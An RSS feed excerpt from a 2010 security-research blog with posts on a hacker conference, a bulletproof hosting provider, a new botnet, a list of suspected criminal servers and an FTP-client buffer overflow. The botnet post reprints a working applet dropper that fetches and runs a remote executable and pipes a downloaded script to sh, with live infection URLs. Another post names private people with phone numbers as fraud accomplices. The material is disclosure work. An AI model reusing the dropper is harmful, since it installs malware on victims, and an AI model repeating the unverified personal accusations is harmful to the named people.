			<content:encoded><![CDATA[<p>This year was the same like other year at the event. But after being spammed 9 emails within one minute by CCC SIGINT, we decided that we should at least show our faces at the event. The subject from the emails where Call for Paper for the SIGINT2010 event. But because we sadly enough we didn&#8217;t have enough time for it but next year we are keen to discussing participating in the event. By the way a quick reminder another nice upcoming event is &#8220;Hackinthebox&#8221; in Amsterdam. But back on topic &#8230;</p>
<p><span id="more-1333"></span>The impression from the event was the following &#8230;<br />
Instead of forming groups from hacktivist and hackers people came to this event to vent their opinion on different subjects and decisions from the state. This to try and get people to stand up against these decisions. This in opposite of just showing of found vulnerabilities or technical details and such. In particularly the talks about censorship were annoying at this event as they have been done to many times at CCC related events. Most people also couldn&#8217;t agree this year on whether there are more politically technical or industrial technical group formations. Tough one thing must be said in addition to that, the main reason for this is basically because the main event organizer CCC isn&#8217;t neutral themselves. The most topics are in line with all other topics from events done by CCC. Even though some of the presentations missed their goal a few of them were still a bit interesting.</p>
<p>Most interesting and worth a notice are for example &#8230;</p>
<p><strong>Day 1:</strong><br />
Identitäts-Kriege: vom Ende menschlicher Gesellschaftsform<br />
Attack vectors against mobile devices<br />
Misstraue Autoritäten &#8211; fördere Dezentralisierung?</p>
<p><strong>Day 2:</strong><br />
Das überwachte Netz<br />
Malware Joe Blobs<br />
Botnets in 2010</p>
<p><strong>Day 3:</strong><br />
Opensource policies for governments</p>
<p>The following topics were either bad or boring &#8230;<br />
Kommunismus oder Kommunitarismus? Voraussetzungen &#8211; Neues Urheberrecht<br />
Der Abmahnwahn in Deutschland<br />
Die Kirche im Staat lassen<br />
Auf der Überholspur zum Stoppschild<br />
Volkszaehler Beitrag<br />
Das überwachte Netz<br />
Police State</p>
<p>About one presentation we would like to say something &#8230; Women and Geek Culture &#8211; What&#8217;s the problem, guys?<br />
At the presentation information at the website it stated &#8230;</p>
<p>&#8220;The biggest enemy of hackerspaces and techshops is probably girlfriends and wives&#8221;.<br />
&#8230; &amp; degree of sexism in the different fields and finally finding some strategies to better integrate women into geekery.</p>
<p>So after I had read that, I&#8217;ve wondered with what background idea they wanted to try and justify the none negotiable moral values.<br />
If only hang out with the old-established generation, one should not wonder when 90% of the people who don&#8217;t know otherwise are discriminating. Women have the same rights in becoming a hacktivist/geek/nerd/gamer/cracker/coder without any restriction.<br />
So there is no point trying to generate respect from male geeks / hackers at SIGINT2010 and later editions to justify that fact.</p>
<p>People who don&#8217;t want to evolve out of being a digital Neanderthaler and try and limit other people with idiotic sexism and other restrictions, are found in all walks of life.<br />
It would be more useful to mobilize people instead of telling them that certain things are bad. This because if u mobilize enough people other groups can no longer ignore the mobilized group.<br />
However, some skills surpass the normal geek motivations and driving forces. Especially the acting instead of explaining why it&#8217;s bad results in change or recognition.<br />
This in addition to the enthusiasm for a meaningful idea and being motivated and striving to create something.<br />
Apart from this all is SIGINT2010 the wrong event for this kind of subject mainly because of the fact that the comprehension for women and technology is already at CCC.<br />
-</p>
<p>At the second day around 21 O clock there was an interesting private party in a nearby hotel room. Where a few good interesting sessions &amp; prv workshops were held.  On one of the video walls 3 DVDs were showed from different groups. Containing demos, new prv stuff and interesting Advisories and vulnerabilities.  Also from a group who wants to stay secret there was a presentation about a complex vulnerability-lab project with a demo video of their project which is soon to go live.</p>
<p>All by all my weekend was fine, though like many other people i found the content of the event was not that good.<br />
Nevertheless, we are definitely on the next SIGINT in 2011 (SIGINT2011) with an interesting presentation with a topic about: &#8220;Hacktivism 2010/2011 &#8211; Political Hacktivists&#8221;.<br />
<img src="http://www.global-evolution.info/news/files/sigint2010/sigint2010.jpg" alt="" width="605" height="403" /><br />
<strong>Greetz: </strong><br />
SiFU, Mariuz CANI, Benny CCC Gießen, Olivia, der typ mit dem teuren Projektor, Daniela Queen of SQL, David v. K., berni, m0Z, my Team &amp; the famous hacking rest we guess &#8230;</p>
<p>[<strong>Writer:</strong> ~Rem0ve &amp; ~X4lt]</p>
]]></content:encoded>
			<wfw:commentRss>http://www.global-evolution.info/news/?feed=rss2&amp;p=1333</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Evil Offshore Hosting &#8211; Ddos,Spam, Carders &amp; Malware</title>
		<link>http://www.global-evolution.info/news/?p=1321</link>
		<comments>http://www.global-evolution.info/news/?p=1321#comments</comments>
		<pubDate>Wed, 19 May 2010 16:47:30 +0000</pubDate>
		<dc:creator>GE TEAM</dc:creator>
				<category><![CDATA[All]]></category>

		<guid isPermaLink="false">http://www.global-evolution.info/news/?p=1321</guid>
		<description><![CDATA[In the last week we focused us on illegal hosting companies who are mainly located at Russia. After a short while we got lucky and intercepted a rater interesting email from one of those hosting providers. In this email the company is advertising to find new clients. Instead of normally advertising the good products the [...]]]></description>
			<content:encoded><![CDATA[<p>In the last week we focused us on illegal hosting companies who are mainly located at Russia. After a short while we got lucky and intercepted a rater interesting email from one of those hosting providers. In this email the company is advertising to find new clients. Instead of normally advertising the good products the email advertises with the fact that illegal content is allowed and that they don&#8217;t give out information to police or the Data-Center.</p>
<p><span id="more-1321"></span><strong>Delivered-To:</strong> *@gmail.com<br />
<strong>Received: </strong>by 10.204.82.149 with SMTP id b21cs20bkl;<br />
Fri, 14 May 2010 23:00:09 -0700 (PDT)<br />
<strong>Received:</strong> by 10.143.26.21 with SMTP id d21mr1381706wfj.225.1273903207989;<br />
Fri, 14 May 2010 23:00:07 -0700 (PDT)<br />
<strong> Return-Path:</strong><br />
<strong>Received:</strong> from box1.ddoshostingsolutions.com (ddoshostingsolutions.com [67.220.67.50])<br />
by mx.google.com with ESMTP id 15si4116103pzk.121.2010.05.14.23.00.07;<br />
Fri, 14 May 2010 23:00:07 -0700 (PDT)<br />
Received-SPF: neutral (google.com: 67.220.67.50 is neither permitted nor denied by domain of promotion@safetyhost.org) client-ip=67.220.67.50;<br />
Authentication-Results: mx.google.com; spf=neutral (google.com: 67.220.67.50 is neither permitted nor denied by domain of promotion@safetyhost.org) smtp.mail=promotion@safetyhost.org<br />
<strong>Message-Id:</strong> &lt;4bee3867.8f13f30a.2039.4237SMTPIN_ADDED@mx.google.com&gt;<br />
<strong>Received:</strong> from [92.241.164.47] (helo=bie)<br />
by box1.ddoshostingsolutions.com with esmtpa (Exim 4.67)<br />
(envelope-from<br />
)<br />
id 1ODAPt-0003wY-TB<br />
for *@gmail.com; Fri, 14 May 2010 23:00:06 -0700<br />
<strong>From:</strong> &#8220;SafetyHost&#8221;<br />
<strong>Subject:</strong> Offshore Webhosting<br />
To: *@gmail.com<br />
<strong>Content-Type:</strong> text/plain;<br />
<strong>Reply-To:</strong> promotion@safetyhost.org<br />
<strong>Date:</strong> Sat, 15 May 2010 08:00:04 +0430<br />
<strong>X-Priority:</strong> 3<br />
<strong>X-Library:</strong> Indy 8.0.25</p>
<p>Sehr geehrter Kunde,<br />
seit ein paar Wochen nun konnten wir uns auf dem Markt etablieren !</p>
<p>Wir bieten Ihnen ein sehr sicheres Hosting für illegalen oder grenzwertigen Inhalt. Unsere Server stehen im Wahome Data Center (Russland). In diesem Bezirk hosten übrigens auch fast 90% aller deutschen Hacking Foren sowie knapp 80% aller Warez Seiten.</p>
<p>Auf unseren Webspace-Servern erlauben wir FAST alles, hier eine Liste mit kleinen Ausnahmen:<br />
- Kinderpornografie</p>
<p>Wir bieten 101% Anonymität und Sicherheit für ihr Projekt. Geben sie bei der schlanken Anmeldung auf unserer Website ruhig mit gutem Gewissen falsche Daten an, denn es hat ja keinen zu interessieren wer Sie wirklich sind und was Sie im Internet treiben !</p>
<p>Als Zahlungsmethode akzeptieren wir die völlig anonyme und sichere Methode der Wertkarten in Form von Paysafecard/uKash, diese bekommen Sie nahezu an jeder Tankstelle oder im Drogeriemarkt sowie an vielen anderen Verkaufstellen. Schauen Sie doch mal bei uns vorbei und überzeugen Sie<br />
sich gleich von unseren günstigen Angeboten,</p>
<p>http://safetyhost.org/</p>
<p>Mit freundlichen Grüßen,<br />
Torben Schneider<br />
&#8212;-</p>
<p>Now some readers will surely think of how far it has come already. He offers us as a hosting provider to host any illegal activities, also he says that 90% of all Russian &amp; German hacking crews are active there. Next to this he then gives us a URL to his site and also says that we can pay by PSC / uKash.</p>
<p>Why these two payment methods are used by Carders &amp; Fraud Freaks?<br />
Paysafecards (DE) / uKash (RU), these are like phone cards as you can buy them anonymously at the gas station. So ideal for any hackers, crackers and illegal providers in the world needing a anonymous payment method. This as you can transfer without problems with any other WebMoney program so that you end up the money from on a Debit cards, Western Union account or other cashout/resell mehod. Three advantages. The money can be transfered usually with only a minor loss of a few pennies.</p>
<pre><strong>Aktuelle Gebühren per WebMoney:</strong>
Paysafecard -&gt; WME = 10 % Gebühr
Paysafecard -&gt; WMZ = 12 % Gebühr
Ukash -&gt; WME = 12 % Gebühr
Ukash -&gt; WMZ = 14 % Gebühr
</pre>
<p><strong>Abuse &amp; Police</strong></p>
<p>The hoster has so no direct contact with its customers. So if someone gets acussed of abuse the hoster can just say he is only the hoster and clears the eye-catching &#8220;customers&#8221;. So 90% of all offenses that reach the illegal Hoster will be dismissed because he the hoster says he fixed the problem. In addition to the easy &#8220;clean-up&#8221; action it is hard to address the hoster as its located at &#8220;Wahome Data Center&#8221; in Russia.</p>
<p>In a brief private conversation, you could be convinced by the various illegal activities that are allowed and supported.</p>
<p>&#8212;<br />
Hi, habe dein Mailing erhalten, war das von dir ?</p>
<p><strong>Torben S* 	18:02:57</strong><br />
das kann ich ihnen nicht sagen, wir verfügen über mailing listen von knapp 5 mio mails</p>
<p><strong>Torben S* 	18:04:05</strong><br />
ja diese mail wurde von uns versandt</p>
<p><strong>Guest  	18:05:16 </strong></p>
<p>Mhhh gut &#8230; also mietet/vermietet ihr deticated maschinen in ru + verpachtet illegale webserver, server an<br />
die kunden &amp; macht auch noch das angebot &#8230; das fragwürdiger oder illegaler content dort benutzt wird ?</p>
<p><strong>Torben S* 	18:05:14</strong><br />
wir dulden fast alles</p>
<p><strong>Guest 18:05:40</strong><br />
ich suche einen neuen server<br />
habe im mom einige bot tests am laufen und benötige was teures aber dafür gutes</p>
<p><strong>Torben S* 	18:06:20</strong><br />
wir haben eigenes rack</p>
<p>As you can see it has now become normal that people focus on illegal activities across national borders. But he who thinks he would be anonymous because he is located in the Russian Federation should be disappointed. The response is like always only a matter of time. This until other foreign authorities take action or force the local authories to take action.</p>
<p>The owner of &#8220;safetyhost.org&#8221; didn&#8217;t discover a new type of business, but appart from that they will expand their services on to address more customers this depending on the amount of money available for the company.</p>
<p>On one side a user you wants to anonymously use his domain, server, operating, hosting but on the other side, these kind of people<br />
to open up to much opertunities for other illigal activities. For instances it allows providers to conduct illegal transactions within &#8220;our&#8221; infrastructure and because of their position they evade the justice system.</p>
<p>So if you now say you should protect the right to anonymity &#8230; think about the future first and come up with a solution that also restricts hoster / provider as it clearly doesn&#8217;t at the present.</p>
<p>Also in the conversation the available server options were offered&#8230;</p>
<p><em>e8400 Intel Core 2 Duo<br />
Semi-managed Linux dedicated server with NO SETUP FEE<br />
* e8400 Intel Core 2 Duo * 2GB DDR2 RAM<br />
* 160GB SATA HDD * 2000GB Transfer<br />
* Centos operating system (others available on request)</em></p>
<p><em>Pentium 4 2.66GHz<br />
Semi-managed Linux dedicated server with NO SETUP FEE<br />
* Pentium 4 2.66GHz * 1GB DDR2 RAM * 80GB SATA HDD<br />
* 1000GB Transfer<br />
* Centos operating system (others available on request)</em></p>
<p><em>X3350 Quad Core Xeon<br />
Semi-managed Linux dedicated server with NO SETUP FEE<br />
* X3350 Quad Core Xeon * 4GB DDR2 RAM<br />
* 500GB SATA HDD * 3000GB Transfer<br />
* Centos operating system (others available on request)</em></p>
<p><em>Q8200 Core 2 Quad<br />
Semi-managed Linux dedicated server with NO SETUP FEE<br />
* Q8200 Core 2 Quad * 2GB DDR2 RAM<br />
* 160GB SATA HDD * 2000GB Transfer<br />
* Centos operating system (others available on request)</em></p>
<p>As the serverlist already show they own sufficient capacity to host any illegal activities also they are normaly priced (100-150€).<br />
After this we asked&#8230;.</p>
<p><strong>Guest  	20:49:48</strong><br />
wie schaut das bei euch mit abuse oder cops ?</p>
<p><strong>Torben S* 	20:49:51</strong><br />
das wäre unser vorschlag</p>
<p><strong>Torben S* 	20:50:01</strong><br />
wenn sie zufrieden sind dann kaufen sie mehr<br />
abuse und cops werden ignoriert</p>
<p><strong>Torben S*  	21:08:17</strong><br />
haben sie vor noch heute zu bestellen oder wollen sie das morgen tun ?<br />
wir würden wenn sie uns paysafecard senden heute noch einen root aufsetzten<br />
sodass sie sofort loslegen können<br />
&#8212;</p>
<p>Sometimes it is so, so that the host work together with the resellers and attacks by administrators simply be ignored or that the reseller is devalued by one. To cover up the crime. In this scenario the real Starfverfolgungsbehörden in Germany are bound by rules, whether they like it or not.</p>
<p>The only one who could do something about it would be the provider or ISP. It seems that some people in the Data Center Wahome are very comfortable and possible planning some evil projects for the future.</p>
<p>[<strong>Writer:</strong> ~X4lt &amp; ~Rem0ve]</p>
]]></content:encoded>
			<wfw:commentRss>http://www.global-evolution.info/news/?feed=rss2&amp;p=1321</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Barracuda Undetected BotNet &#8211; Upcoming Wave 2010</title>
		<link>http://www.global-evolution.info/news/?p=1300</link>
		<comments>http://www.global-evolution.info/news/?p=1300#comments</comments>
		<pubDate>Mon, 10 May 2010 16:19:53 +0000</pubDate>
		<dc:creator>GE TEAM</dc:creator>
				<category><![CDATA[All]]></category>

		<guid isPermaLink="false">http://www.global-evolution.info/news/?p=1300</guid>
		<description><![CDATA[This morning a nice mail arrived in our mailbox from some russian and german hackers. Who are working  with a barracuda botnet atm.  These criminals use thousand of computers for fraud &#38; payment crimes around Europe, USA,Lettland &#38; Poland. The writer of the email told the people from the mailing list to hold all information [...]]]></description>
			<content:encoded><![CDATA[<p>This morning a nice mail arrived in our mailbox from some russian and german hackers. Who are working  with a barracuda botnet atm.  These criminals use thousand of computers for fraud &amp; payment crimes around Europe, USA,Lettland &amp; Poland. The writer of the email told the people from the mailing list to hold all information private. The mailing had a specific signature of a well known person. The same guy who got <a href="http://board.gulli.com/thread/1480351-bka-schlag-gegen-underground-economy">busted in 2009</a> (AT) because of fraud and Trojan attacks.</p>
<p><span id="more-1300"></span><strong>Delivered-To:</strong><br />
******@gmail.com</p>
<p><strong>Received: </strong><br />
by 10.204.33.5 with SMTP id f5cs27948bkd;<br />
Sat, 8 May 2010 21:25:08 -0700 (PDT)</p>
<p><strong>Received: </strong><br />
by 10.87.50.6 with SMTP id c6mr6863154fgk.41.1273379108490;<br />
Sat, 08 May 2010 21:25:08 -0700 (PDT)</p>
<p><strong>Return-Path: </strong><br />
&lt;unnex@server54.2&#215;4.ru&gt;</p>
<p><strong>Received: </strong><br />
from sendmail.2&#215;4.ru (sendmail.2&#215;4.ru [193.107.16.26])<br />
by mx.google.com with ESMTP id b17si7079620fka.13.2010.05.08.21.25.08;<br />
Sat, 08 May 2010 21:25:08 -0700 (PDT)</p>
<p><strong>Received-SPF: </strong><br />
pass (google.com: domain of unnex@server54.2&#215;4.ru designates 193.107.16.26 as permitted sender) client-ip=193.107.16.26;</p>
<p><strong>Authentication-Results: </strong><br />
mx.google.com; spf=pass (google.com: domain of unnex@server54.2&#215;4.ru designates 193.107.16.26 as permitted sender)<br />
smtp.mail=unnex@server54.2&#215;4.ru</p>
<p><strong>Received: </strong><br />
from server54.2&#215;4.ru (unknown [92.241.169.14])<br />
by sendmail.2&#215;4.ru (Postfix) with ESMTP id AA65D134DDD3<br />
for &lt;******@gmail.com&gt;; Sun,  9 May 2010 08:25:33 +0400 (MSD)</p>
<p><strong>Received: </strong><br />
by server54.2&#215;4.ru (Postfix, from userid 1070)<br />
id 31FF213851CA; Sun,  9 May 2010 08:11:11 +0400 (MSD)</p>
<p><strong>To:</strong> ******@gmail.com</p>
<p><strong>Subject:</strong> Top Secret<br />
<strong>From:</strong> 1337-crew@info.2&#215;4.ru<br />
<strong>Message-Id:</strong> &lt;20100509041111.31FF213851CA@server54.2&#215;4.ru&gt;<br />
<strong>Date:</strong> Sun,  9 May 2010 08:11:11 +0400 (MSD)</p>
<p>Nicht draufklicken! Top Secret &#8211; Versenden!<br />
http://testtest1.u2m.ru/skynetfud.EXE (Barracuda Bot)</p>
<p>GreetZ <strong>13Speedtest37</strong></p>
<p>My first step was to scan the file with a up2date anti-virus program. I used Kaspersky 2010 and i  found out it is undetected.</p>
<p><img class="alignnone" title="undetected - unknown sig" src="http://global-evolution.info/news/files/barra-bn-2010/undetected-kav2010.png" alt="" width="630" height="335" /></p>
<p>Okey after that i checked out some of the servers around and found the infection routine is an Applet as &#8220;.jar&#8221;. Victims get infected by a vulnerability which affected the last  Java Runtime Environment. The victim gets infected over a website  or malicious mails. The owner of the criminal network controls all the servers with a web interface. An analyst could break into the web interface through different vulnerabilities inside of the russian botnet application.</p>
<p><img class="alignnone" src="http://www.global-evolution.info/news/files/barra-bn-2010/panels.png" alt="" width="630" height="335" /></p>
<p>&lt;/applet&gt;<br />
<span style="color: #ff0000;">&lt;applet width=&#8217;1&#8242; height=&#8217;1&#8242; code=&#8217;Update.class&#8217; archive=&#8217;Slide.jar&#8217;&gt;<br />
&lt;param name=&#8217;windows1&#8242; value=&#8217;cmd.exe /c echo Const adTypeBinary = 1 &gt;</span> %temp%\winconfig.vbs &amp; echo Const adSaveCreateOverWrite = 2 &gt;&gt; %temp%\winconfig.vbs &amp; echo Dim S &gt;&gt; %temp%\winconfig.vbs &amp; echo Dim A &gt;&gt; %temp%\winconfig.vbs &amp; echo Dim DTNDTN &gt;&gt; %temp%\winconfig.vbs &amp; echo S = &#8220;ADODB&#8221; &gt;&gt; %temp%\winconfig.vbs &amp; echo A = &#8220;.Stream&#8221; &gt;&gt; %temp%\winconfig.vbs &amp; echo Set DTNDTN = CreateObject(S+A) &gt;&gt; %temp%\winconfig.vbs &amp; echo DTNDTN.Type = adTypeBinary &gt;&gt; %temp%\winconfig.vbs &amp; echo DTNDTN.Open &gt;&gt; %temp%\winconfig.vbs &amp; echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) &gt;&gt; %temp%\winconfig.vbs &amp; echo <span style="color: #ff0000;">DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite </span>&gt;&gt; %temp%\winconfig.vbs &amp; echo Function BinaryGetURL(URL) &gt;&gt; %temp%\winconfig.vbs &amp; echo Dim Http &gt;&gt; %temp%\winconfig.vbs &amp; echo<span style="color: #ff0000;"> Set Http = CreateObject(&#8220;WinHttp.WinHttpRequest.5.1&#8243;) &gt;&gt; %temp%\winconfig.vbs</span> &amp; echo Http.Open &#8220;GET&#8221;, URL, False &gt;&gt; %temp%\winconfig.vbs &amp; echo Http.Send &gt;&gt; %temp%\winconfig.vbs &amp; echo BinaryGetURL = Http.ResponseBody &gt;&gt; %temp%\winconfig.vbs &amp; echo End Function &gt;&gt; %temp%\winconfig.vbs &amp; echo Set shell = <span style="color: #ff0000;">CreateObject(&#8220;WScript.Shell</span>&#8220;) &gt;&gt; <span style="color: #ff0000;">%temp%\winconfig.vbs &amp; echo shell.Run &#8220;%temp%\update.exe&#8221; </span>&gt;&gt; %temp%\winconfig.vbs &amp; start %temp%\<span style="color: #ff0000;">winconfig.vbs http://testtest1.u2m.ru/skynetfud.EXE %temp%\update.exe&#8217;&gt;</span><br />
&lt;param name=&#8217;windows2&#8242; value=&#8221;&gt;<br />
&lt;param name=&#8217;unix1&#8242; value=&#8221;"&gt;<br />
&lt;param name=&#8217;unix2&#8242; value=&#8221;"&gt;<br />
<span style="color: #ff0000;">&lt;param name=&#8217;linux1&#8242; value=&#8221;wget http://sh-lin.sh -O- | sh&#8221;&gt;</span><br />
&lt;param name=&#8217;linux2&#8242; value=&#8221;"&gt;<br />
&lt;/applet&gt;</p>
<p>&#8230; <a href="http://global-evolution.info/news/files/barra-bn-2010/evil-source.txt"> get complete request details</a></p>
<p><strong>Barracuda URL:</strong></p>
<p>http://info.2&#215;4.ru/</p>
<p>http://testtest1.u2m.ru</p>
<p>Hoster &amp; background of the criminal activities is the following isp  &#8230;</p>
<p><strong>http://www.2&#215;4.ru/index.php</strong></p>
<p><strong>File + RAW &amp; HEX:</strong></p>
<p>http://rapidshare.com/files/385318974/barracuda-skynet_ud.rar.html</p>
<p>http://www.file-upload.net/download-2502919/barracuda-skynet_ud.rar.html</p>
<p><strong>Infection Methods:</strong><br />
<img class="alignnone" src="http://www.global-evolution.info/news/files/barra-bn-2010/infection-method.png" alt="" width="630" height="335" /><br />
<img class="alignnone" src="http://www.global-evolution.info/news/files/barra-bn-2010/infection-method2.png" alt="" width="630" height="335" /></p>
<p><strong>Infection Site:</strong><br />
http://celite.in/top/  <strong> =&gt;</strong> code=&#8217;Update.class&#8217; archive=&#8217;Slide.jar&#8217;&gt;     <strong>&lt;= DANGER!</strong><br />
http://testtest1.u2m.ru/skynetfud.EXE     <strong>&lt;= DANGER!</strong></p>
<p>When you follow the leads to the source, you find a lot steps which end up at http://testtest1.u2m.ru/  on this site is a developer site of a coder and guy who lives mostly in the night  &#8230; Alexander M.! From his website you can find leads in the search results of google in some old 1337 threads through russia. After i noticed this i went to an old specific Members of 1337cr3w and asked for Alexander M.  &#8230; the following discussion was logged by a anonymous Guest.</p>
<p>09/05/2010 15:20:08 ‹guest662› kennt einer von euch den hier<br />
09/05/2010 15:20:08 ‹guest662› http://www.outro.ru/<br />
09/05/2010 15:20:41 ‹FL00› alex maldsev?<br />
09/05/2010 15:20:47 * guest374 quit (timeout)<br />
09/05/2010 15:20:55 ‹guest374› jop<br />
09/05/2010 15:21:00 ‹FL00› warum?<br />
09/05/2010 15:21:11 ‹guest662› ja oder nein &#8230; nix schlimmes<br />
09/05/2010 15:21:23 ‹FL00› vllt&#8230;<br />
09/05/2010 15:21:42 * FL00 changes nickname to guest000<br />
09/05/2010 15:22:13 ‹guest662› der macht coole sachen<br />
09/05/2010 15:22:29 ‹guest662› kenne den von früher da hat er viel mit hosting usw. gemacht<br />
09/05/2010 15:22:33 * guest92 joins My room<br />
09/05/2010 15:22:38 ‹guest662› woher kennst du ihn ?<br />
09/05/2010 15:22:48 ‹guest92› welcher huso versendet hier die Viren via Mail?<br />
09/05/2010 15:25:13 ‹guest82› der ist noch im alten Team</p>
<p>In the Logs you can read that these people know the guy behind that Russian website. On our next thread about the barracuda botnet we will explain how to hack into the botnet control application. This posts just shows how criminals are again working on a new and structured botnet for the future.</p>
<p>[<strong>Writer:</strong> ~X4lt &amp; ~Rem0ve]</p>
]]></content:encoded>
			<wfw:commentRss>http://www.global-evolution.info/news/?feed=rss2&amp;p=1300</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Behind Red Enemy Lines &#8211; Russian Hacker Networks</title>
		<link>http://www.global-evolution.info/news/?p=1232</link>
		<comments>http://www.global-evolution.info/news/?p=1232#comments</comments>
		<pubDate>Mon, 26 Apr 2010 14:32:18 +0000</pubDate>
		<dc:creator>GE TEAM</dc:creator>
				<category><![CDATA[All]]></category>

		<guid isPermaLink="false">http://www.global-evolution.info/news/?p=1232</guid>
		<description><![CDATA[Time to release some very active russian ip for analysts around the planet. The following servers are hosting till now spam-scripts, card fraud material, a recruit board, webshells &#38; different log entries from were exactly the russian attackers coming from.  After my views around the material &#38; maps &#8230; time has come to make all [...]]]></description>
			<content:encoded><![CDATA[<p>Time to release some very active russian ip for analysts around the planet. The following servers are hosting till now spam-scripts, card fraud material, a recruit board, webshells &amp; different log entries from were exactly the russian attackers coming from.  After my views around the material &amp; maps &#8230; time has come to make all public for other analysts and researcher.</p>
<p><span id="more-1232"></span>The following servers are destructive russian hacking/fraud &amp; spam servers out of a network. Up2Date &amp; Active  ;)</p>
<p><strong>83.222.127.80<br />
83.222.127.54<br />
83.222.125.245</strong></p>
<p><strong><br />
212.115.225.38<br />
212.124.112.35</strong></p>
<p><strong>83.12.51.2<br />
221.132.46.2<br />
207.194.87.105<br />
89.248.172.14<br />
217.20.127.197<br />
109.108.62.147<br />
78.227.126.169<br />
217.29.30.20<br />
78.173.16.71<br />
213.167.197.160<br />
94.76.87.154<br />
89.28.3.241<br />
77.27.27.65<br />
89.208.121.35<br />
62.122.211.4<br />
165.65.69.130<br />
190.54.16.184<br />
212.115.225.20<br />
62.1.110.245<br />
213.149.222.230<br />
195.113.185.4<br />
174.129.5.87<br />
82.224.232.175<br />
213.217.58.18<br />
194.71.15.242<br />
173.203.206.253<br />
212.76.127.132<br />
203.172.248.29<br />
212.124.112.109<br />
85.214.150.97<br />
124.42.10.119<br />
195.70.55.151<br />
200.238.83.49<br />
200.78.224.77<br />
61.244.235.34<br />
79.98.31.191<br />
86.103.239.44<br />
62.141.50.119<br />
213.167.197.160<br />
219.150.168.70<br />
193.87.173.106<br />
194.44.166.172<br />
220.181.66.163<br />
94.142.131.181<br />
95.28.85.202<br />
125.234.1.98<br />
203.199.50.19<br />
89.28.3.241<br />
125.160.76.84<br />
187.9.11.187<br />
87.106.177.76<br />
88.201.1.220</strong></p>
<p>On my way through the russian nets i found different high criminal activities around carding fraud &amp; how they do there payments<strong>. </strong>The following bank accounts &amp; phone numbers are used by high criminal russian &amp; east carder/fraud groups &#8230;<strong><br />
</strong></p>
<p><strong>First name:</strong> Ognjen<br />
<strong>Last name :</strong> Miric<br />
<strong>City:</strong> Sarajevo<br />
<strong>Country:</strong> Bosnia and Herzegovina<br />
<strong>Zip:</strong> 71000<br />
<strong>Phone:</strong>+38763136888</p>
<p><strong>Name:</strong> Mihalache ioan Lucian<br />
<strong>City:</strong> iasi<br />
<strong>Country:</strong> Romania<br />
<strong>Phone Number:</strong> +40742169390<br />
<strong>Bank: </strong>Western Union<br />
<strong>IBN: </strong>RO42****</p>
<p>The most of the servers are used for daily fraud, malware attacks &amp; spam by different famous russian carder/fraud crews out of the not legal payment scene. The phone numbers are for communication between the seller &amp; buyer<strong> </strong>through different countries.<strong> </strong>The Bank accounts are given out by a &#8220;unknown&#8221; ^^ insider on western union to transfer the payments of  &#8220;customers&#8221;.<strong><br />
</strong></p>
<p><img class="alignleft" src="http://img683.imageshack.us/img683/8759/20364339.jpg" alt="" width="630" height="322" /></p>
<p>[Writer: ~Rem0ve]</p>
]]></content:encoded>
			<wfw:commentRss>http://www.global-evolution.info/news/?feed=rss2&amp;p=1232</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>FTPRush v1.1.3b &#8211; Stack Buffer Overflow Vulnerability</title>
		<link>http://www.global-evolution.info/news/?p=1199</link>
		<comments>http://www.global-evolution.info/news/?p=1199#comments</comments>
		<pubDate>Fri, 23 Apr 2010 13:57:51 +0000</pubDate>
		<dc:creator>GE TEAM</dc:creator>
				<category><![CDATA[All]]></category>

		<guid isPermaLink="false">http://www.global-evolution.info/news/?p=1199</guid>
		<description><![CDATA[We are back from work on a new public security project, what have his start-up next month. In the last days i checked out a new FTP client what is very often used in the FXP/Admin Scene. FTPRush is prone to a Stack based Buffer Overflow Vulnerability. A local or remote attacker is able to overwrite [...]]]></description>
			<content:encoded><![CDATA[<p><strong> </strong>We are back from work on a new public security project, what have his start-up next month. In the last days i checked out a new FTP client what is very often used in the FXP/Admin Scene. FTPRush is prone to a  Stack based Buffer Overflow Vulnerability. A local or remote attacker is able to  overwrite the ECX &amp; EIP.  No validation checks are performed on the  length of the file endings on transfer queue.  By passing in a long file  ending string, it is possible to trigger a stack-based buffer overflow,  resulting in the execution of arbitrary code. This Vulnerability is local &amp; remote exploitable &amp; marked as zer0day issue.</p>
<p><span id="more-1199"></span>The following 2 pictures show some crashs around the vulnerability on the software client &#8230;</p>
<p><img src="http://global-evolution.info/news/files/ftprush/overflow3.png" alt="" width="625" height="335" /></p>
<p><img src="http://global-evolution.info/news/files/ftprush/overflow2.png" alt="" width="625" height="335" /></p>
<p>Overview on WinDBG &#8211; ECX &amp; EIP overwwritten &#8230;</p>
<p><img src="http://global-evolution.info/news/files/ftprush/overflow1.png" alt="" width="625" height="335" /></p>
<p>Watch the movie below to learn how to analyze a windows program. Here can you download(high quality) or view(flash) the analyses video with the software &amp; a debugger. The video is produced by rem0ve for hacking-lab on published by ivan bütler &#8230;</p>
<p><strong>View:</strong> <a href="http://media.hacking-lab.com/movies/ftprush/ftprush.flv">FTPRush Z0D Buffer Overflow</a> or <a href="http://media.hacking-lab.com/movies/ftprush/">http://media.hacking-lab.com/movies/ftprush/</a>(Flash)</p>
<p><strong>Download:</strong> <a href="http://media.hacking-lab.com/largefiles/ftprush-stack-overflow3.wmv">http://media.hacking-lab.com/largefiles/ftprush-stack-overflow3.wmv</a> (WMV)</p>
<p><strong>ADV:</strong><a href="http://hacking-lab.com/news/newspage/buffer-overflow-vulnerability-on-ftprush.html">http://hacking-lab.com/news/newspage/buffer-overflow-vulnerability-on-ftprush.html</a></p>
<p>The Software allows the attacker to get a 1A local/remote PoC  as . xml or rfq for transfer queue. The complete advisory got published after the vendor fixed the overflow issue in a stable update.</p>
<p>View the History to see upcoming issues &#8230; <a href="http://www.ftprush.com/product-ftprush-history.html"></a></p>
<p><a href="http://www.ftprush.com/product-ftprush-history.html">http://www.ftprush.com/product-ftprush-history.html</a></p>
<p style="text-align: left;">
<p>[<strong>Writer:</strong> ~x4lt]</p>
]]></content:encoded>
			<wfw:commentRss>http://www.global-evolution.info/news/?feed=rss2&amp;p=1199</wfw:commentRss>
		<slash:comments>2</slash:comments>
<enclosure url="http://media.hacking-lab.com/movies/ftprush/ftprush.flv" length="14934121" type="video/x-flv" />
<enclosure url="http://media.hacking-lab.com/largefiles/ftprush-stack-overflow3.wmv" length="17274861" type="video/x-ms-wmv" />
		</item>
		<item>
